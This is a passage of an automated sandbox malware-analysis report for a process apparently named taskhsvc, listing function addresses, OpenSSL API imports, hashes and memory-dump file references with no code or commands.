                                                            • Instruction ID: abe4db68a237994ad238973fae57fb51ecb5e0777f0bdefc108e7aa6d5d98ba6
                                                            • Opcode Fuzzy Hash: 866d147eb1dbc2273ab3b82b703b3816536f8eade7a89ec3bcf5450114869591
                                                            • Instruction Fuzzy Hash: BA0146B56097108BD710AF25C980A4FFBF4EF88648F218C2DE69887710C739E906CB97
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE264BC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • sk_num.LIBEAY32 ref: 6CE263CF
                                                            • ERR_put_error.LIBEAY32 ref: 6CE26426
                                                              • Part of subcall function 6CEDA930: ERR_get_state.LIBEAY32 ref: 6CEDA95E
                                                            • CRYPTO_free.LIBEAY32 ref: 6CE2643D
                                                            • sk_set.LIBEAY32 ref: 6CE264B1
                                                            • sk_new_null.LIBEAY32 ref: 6CE264CE
                                                              • Part of subcall function 6CED2FB0: CRYPTO_malloc.LIBEAY32 ref: 6CED2FD6
                                                              • Part of subcall function 6CED2FB0: CRYPTO_malloc.LIBEAY32 ref: 6CED2FFC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_malloc$O_freeR_get_stateR_put_errorsk_new_nullsk_numsk_set
                                                            • String ID: A$f
                                                            • API String ID: 3131146646-3676314414
                                                            • Opcode ID: 1aaf8979e680a53ca387a7b308fac3198004d7c11e5c91d309b26be012141735
                                                            • Instruction ID: e02b6bc6693d8a4fdb63f6a4d8dfeffcbdf067ddfd69b96a98f1629cb1d463e8
                                                            • Opcode Fuzzy Hash: 1aaf8979e680a53ca387a7b308fac3198004d7c11e5c91d309b26be012141735
                                                            • Instruction Fuzzy Hash: 0BF0F4B11083028BD7009F69D04434AB7F4FB8435CF265A2DE9D89BB50D77AA9498B82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF4C6E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A$f$i
                                                            • API String ID: 0-87896389
                                                            • Opcode ID: 7eabd92602414e01ed863c5381110d2cac8d02dba93307dca34622a21fd6e916
                                                            • Instruction ID: 89453c8782bf71b429b02662461f89c0ac8179518a38c3c5154c2c8b004ff97e
                                                            • Opcode Fuzzy Hash: 7eabd92602414e01ed863c5381110d2cac8d02dba93307dca34622a21fd6e916
                                                            • Instruction Fuzzy Hash: FAF06DB15097028BE300AF66C54061BBFF5AFC0788F12D91CACA40B741D7B6C8098BA3
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF74470 Relevance: 7.6, APIs: 5, Instructions: 102COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: aa0c90fa7c2d99c3c31ee106c6ae4db70aead0c156c64142a0152a75b3192da9
                                                            • Instruction ID: 12f614aad8331df3d56a015c8e59f55025876ec234fd639c7b7f6fddbd3df31c
                                                            • Opcode Fuzzy Hash: aa0c90fa7c2d99c3c31ee106c6ae4db70aead0c156c64142a0152a75b3192da9
                                                            • Instruction Fuzzy Hash: 8541C9756097018FD720CF29D18091ABBF0FF89758F25896EE9A88B750D730E801CF62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEC8E70 Relevance: 7.6, APIs: 5, Instructions: 98networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 2987856527-0
                                                            • Opcode ID: 70f68c22721937474e28e5028908ade63f4d7fc4f22fca3126c1e593a43f887b
                                                            • Instruction ID: e697082c2884dff1725c34a8f98ac3f79f49d4b67c30be7d0cf7e5fe8cde7e1e
                                                            • Opcode Fuzzy Hash: 70f68c22721937474e28e5028908ade63f4d7fc4f22fca3126c1e593a43f887b
                                                            • Instruction Fuzzy Hash: 93314D717086408FC710DF29C68165BB7F2BB8A32CF65892EE669CB740D631E941CB97
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEC0880 Relevance: 7.6, APIs: 5, Instructions: 94COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_lock$lh_retrievesk_delete_ptrsk_push
                                                            • String ID:
                                                            • API String ID: 2370585614-0
                                                            • Opcode ID: ec31e94765ca894aed57176d6a441634471a05e38dd5ac174d8522a3d30d83d6
                                                            • Instruction ID: d473cb977cbb9b25b90399b37dad7e59ddd614937df384b64d4dee31b7bc4ab3
                                                            • Opcode Fuzzy Hash: ec31e94765ca894aed57176d6a441634471a05e38dd5ac174d8522a3d30d83d6
                                                            • Instruction Fuzzy Hash: 224129B16087418FEB00DF25C64235BBBF0ABC5308F51991DE9A86B710D775E6498F83
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF46D10 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 4216919130-0
                                                            • Opcode ID: a7dc5f24d82a8219f962144650ca792988ef251bb83b2d638464c47edfc60f58
                                                            • Instruction ID: ac0bf776cc636aa352d0aa228bfc102330023673ee1b30c504f7aaa7410aec4b
                                                            • Opcode Fuzzy Hash: a7dc5f24d82a8219f962144650ca792988ef251bb83b2d638464c47edfc60f58
                                                            • Instruction Fuzzy Hash: 47313D316086008FDB04DF29C24165BB7F1FB89318F46CA5DE599AB701D738BA05CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEB0C00 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 4216919130-0
                                                            • Opcode ID: eef3a5873d0132ebc94f963609077da701ab21314e4ffae01c7a5b55919e388e
                                                            • Instruction ID: 1561e4706594a98a2351ae827128391c0640095ffaa39bca76a5ed2f82bb9bd7
                                                            • Opcode Fuzzy Hash: eef3a5873d0132ebc94f963609077da701ab21314e4ffae01c7a5b55919e388e
                                                            • Instruction Fuzzy Hash: 0D3121759046409FCB10EF29C74151BB7F1BB89318F96C95CEA689B701E335FA048F96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF06F20 Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
